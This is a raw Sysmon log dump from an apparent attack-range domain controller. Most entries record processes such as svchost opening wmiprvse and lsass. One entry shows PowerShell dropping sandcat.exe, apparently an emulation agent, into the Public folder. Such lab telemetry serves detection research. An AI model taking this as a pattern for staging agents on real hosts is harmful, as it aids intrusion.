10341000x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.525{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.494{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.494{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.494{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.025{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.025{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:32.931{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:32.931{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:32.931{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:32.916{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:32.916{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:32.916{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localEXE2021-01-14 13:09:32.072{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2021-01-14 13:08:10.235 13241300x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:32.041{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 10341000x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.885{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.885{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.885{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 